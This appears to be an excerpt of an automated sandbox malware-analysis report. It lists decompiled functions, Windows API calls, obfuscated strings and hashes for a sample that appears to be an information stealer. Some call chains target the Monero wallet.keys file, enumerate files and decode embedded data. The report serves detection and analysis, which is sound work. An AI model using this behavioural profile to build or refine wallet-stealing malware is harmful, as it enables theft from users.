                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 2_$$)]{$?Bo$DJFH$IyU$Zu^Q$`SvI$a^uv$u}_
                        • API String ID: 0-1183427295
                        • Opcode ID: 38a97943fc73f9a6ff953fa816c8e56b331cbc4ae67618c3e96ad87138d75250
                        • Instruction ID: 474c51faa20335c7d53bddf1443ba9f233accfb87860c94e509737f233b4c182
                        • Opcode Fuzzy Hash: 38a97943fc73f9a6ff953fa816c8e56b331cbc4ae67618c3e96ad87138d75250
                        • Instruction Fuzzy Hash: 8FB2D5F360C2049FE304AE29EC8567AFBE9EF94720F1A893DE6C4C7744E63558418696
                        Function 00AA7A10 Relevance: 11.6, Strings: 8, Instructions: 1566COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: }_$?l_7$Fj{$R.b}$XF>$Z6_${&v$|"3
                        • API String ID: 0-1248171081
                        • Opcode ID: 33fb4aafdad2a402acc931e0915810272ac2c0e3feb180e53bbeffd6875d7255
                        • Instruction ID: 15eeaf0f3fcaa35373bd3172c4edd4802aefe8774af0812758a2cf25dc631938
                        • Opcode Fuzzy Hash: 33fb4aafdad2a402acc931e0915810272ac2c0e3feb180e53bbeffd6875d7255
                        • Instruction Fuzzy Hash: FBB2D4F360C2049FE704AE29EC8577ABBE5EB94320F16893DEAC4C7744EA3558058697
                        Function 00AAE675 Relevance: 11.6, Strings: 8, Instructions: 1557COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: ;y]^$;y]^$Io"!$ULSo$a;^$rJS7$rw/p$w1
                        • API String ID: 0-2864300429
                        • Opcode ID: 40b46525e8d6b2528abef7a04fca1107af7ff1cc58075cd17eb963b154917065
                        • Instruction ID: 4d64db3493ca99904cc784aeba733c6b82de4876322cdc9cb787522feb38c193
                        • Opcode Fuzzy Hash: 40b46525e8d6b2528abef7a04fca1107af7ff1cc58075cd17eb963b154917065
                        • Instruction Fuzzy Hash: C7A218F360C2049FE3046E2DEC8567ABBE9EFD4720F1A863DE6C4C7744E63598418696
                        Function 006E7B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                        • GetKeyboardLayoutList.USER32(00000000,00000000,006F05AF), ref: 006E7BE1
                        • LocalAlloc.KERNEL32(00000040,?), ref: 006E7BF9
                        • GetKeyboardLayoutList.USER32(?,00000000), ref: 006E7C0D
                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 006E7C62
                        • LocalFree.KERNEL32(00000000), ref: 006E7D22
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                        • String ID: /
                        • API String ID: 3090951853-4001269591
                        • Opcode ID: 8b46304502c5eee6c4d0daa3457a49686c354f976986e1fbd839f89039337e4d
                        • Instruction ID: 4bc7b2597e36ed32788fedf04b5117e420e0f56c6b704709cfbf76a71eaaa065
                        • Opcode Fuzzy Hash: 8b46304502c5eee6c4d0daa3457a49686c354f976986e1fbd839f89039337e4d
                        • Instruction Fuzzy Hash: A4417E71912258ABDB64DB95DC89BEEB37AFF44700F2041D9E00962291DB342F86CFA5
                        Function 00A9BD9F Relevance: 10.4, Strings: 7, Instructions: 1688COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: '+{w$22zq$3^w$O'[$S0{}$wE|]$}sz
                        • API String ID: 0-557880407
                        • Opcode ID: c89c4b8ce9725dca8c58bf760fcdf833f674af30e0802e9d2c4f06384939c868
                        • Instruction ID: 25bd668a4fbae3be01f16d895381efa8560df5d4e5753c6c47a67e36467cb006
                        • Opcode Fuzzy Hash: c89c4b8ce9725dca8c58bf760fcdf833f674af30e0802e9d2c4f06384939c868
                        • Instruction Fuzzy Hash: C8B207F360C604AFE3046E2DEC8567AFBE9EF94720F16862DE6C4C7744EA3558018696
                        Function 00A96CCC Relevance: 10.4, Strings: 7, Instructions: 1671COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: Ay?$2m?.$>$ds$@hon$Z6t$Zs~$};}/
                        • API String ID: 0-954932429
                        • Opcode ID: d92166e6cebd5946b1aad8c8a6babf03f801ea4674d1a2d2590de7ebee9bd769
                        • Instruction ID: 8bf615163b49dfea4caa87b3b48816f8e3c8a4f82c7f705a1fe075ab482c7947
                        • Opcode Fuzzy Hash: d92166e6cebd5946b1aad8c8a6babf03f801ea4674d1a2d2590de7ebee9bd769
                        • Instruction Fuzzy Hash: A9B25BF3A0C2149FE3046F2DEC8567ABBE9EF94720F1A463DEAC4D3744E67558018692
                        Function 00AA9418 Relevance: 10.4, Strings: 7, Instructions: 1616COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: L}m$$"o~$R0e$bIv$xK^$|m{$}>
                        • API String ID: 0-3829165952
                        • Opcode ID: f245424869320f09b7433bd2bc485cae9c1d3093945b0439c1eede87a647e21e
                        • Instruction ID: 0e29ab269704beb8fcb60508657b29a7ce3cd14b598a0145f176ecbd907c7cc2
                        • Opcode Fuzzy Hash: f245424869320f09b7433bd2bc485cae9c1d3093945b0439c1eede87a647e21e
                        • Instruction Fuzzy Hash: FCB217F3A0C200AFE7046E2DEC8567ABBE9EF94720F16453DEAC5C7744EA3558018796
                        Function 006DE430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                          • Part of subcall function 006EA920: lstrcpy.KERNEL32(00000000,?), ref: 006EA972
                          • Part of subcall function 006EA920: lstrcat.KERNEL32(00000000), ref: 006EA982
                          • Part of subcall function 006EA9B0: lstrlen.KERNEL32(?,00E491C8,?,\Monero\wallet.keys,006F0E17), ref: 006EA9C5
                          • Part of subcall function 006EA9B0: lstrcpy.KERNEL32(00000000), ref: 006EAA04
                          • Part of subcall function 006EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006EAA12
                          • Part of subcall function 006EA8A0: lstrcpy.KERNEL32(?,006F0E17), ref: 006EA905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,006F0D73), ref: 006DE4A2
                        • StrCmpCA.SHLWAPI(?,006F14F8), ref: 006DE4F2
                        • StrCmpCA.SHLWAPI(?,006F14FC), ref: 006DE508
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 006DEBDF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                        • String ID: \*.*
                        • API String ID: 433455689-1173974218
                        • Opcode ID: 998788ffc3b0c9f690404d72760973f94a5983a8be4e2eda95689dea9865b8f3
                        • Instruction ID: cf1cd00ff4b2a5c0270944047a27d8d67d9d36d1fea96c5195ab4578816002de
                        • Opcode Fuzzy Hash: 998788ffc3b0c9f690404d72760973f94a5983a8be4e2eda95689dea9865b8f3
                        • Instruction Fuzzy Hash: 0712B3719122489ADB54FBA1DC96EEE733BAF44300F4141ADB10A96092EF307F49CF96
                        Function 00A9DA81 Relevance: 9.2, Strings: 6, Instructions: 1655COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 0ab+$97}s$?Ws_$@.?c$^.5$ck:
                        • API String ID: 0-3215478088
                        • Opcode ID: e8d11afe97f84c2ec42af0a1c8c11b21b731dea9ac1f51e13d76caead2ffccb4
                        • Instruction ID: 26abf7e3b30739c1048a9b667b7cfede8efa60e1a5bd3b50177609c651430b61
                        • Opcode Fuzzy Hash: e8d11afe97f84c2ec42af0a1c8c11b21b731dea9ac1f51e13d76caead2ffccb4
                        • Instruction Fuzzy Hash: DCB22AF3A0C2049FE3046E2DEC8567ABBE9EF94720F1A453DEAC5D3740EA7558048696
                        Function 00AAC9E2 Relevance: 9.1, Strings: 6, Instructions: 1610COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: $LV~$Hz>$L=_{$s*9;$z{u$}W5
                        • API String ID: 0-745962142
                        • Opcode ID: ca7806d35819a908c372554138e4ef6b1bd20a7bc5e75f39aa7b79718c353317
                        • Instruction ID: 79f429bb42d08f32f4e3d7bbb146bf3ed9c00b4569a5ba7489c8916c40b82123
                        • Opcode Fuzzy Hash: ca7806d35819a908c372554138e4ef6b1bd20a7bc5e75f39aa7b79718c353317
                        • Instruction Fuzzy Hash: 78B218F3A0C2049FD7046E6DEC8566AFBE9EF94720F16893DEAC4C3344E63598058697
                        Function 00AA29A0 Relevance: 9.1, Strings: 6, Instructions: 1581COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: "o$#q}$1q;c$F9u*$JuVa$cuiO
                        • API String ID: 0-3120144723
                        • Opcode ID: ebafd384a30a03b06d519a133778ebd0683ebf4285e4dd93cfe210d30ed46cc0
                        • Instruction ID: 5edf0e6d90d7b0931197180dfec18bce27af086ad9d50d7d308018076306fc86
                        • Opcode Fuzzy Hash: ebafd384a30a03b06d519a133778ebd0683ebf4285e4dd93cfe210d30ed46cc0
                        • Instruction Fuzzy Hash: 8CB2F7F3A0C2049FE304AE2DEC8567ABBE9EF94320F16493DE6C4C7744EA7558418796
                        Function 006D9AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                        Download Yara Rule
                        APIs
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nm,00000000,00000000), ref: 006D9AEF
                        • LocalAlloc.KERNEL32(00000040,?,?,?,006D4EEE,00000000,?), ref: 006D9B01
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nm,00000000,00000000), ref: 006D9B2A
                        • LocalFree.KERNEL32(?,?,?,?,006D4EEE,00000000,?), ref: 006D9B3F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
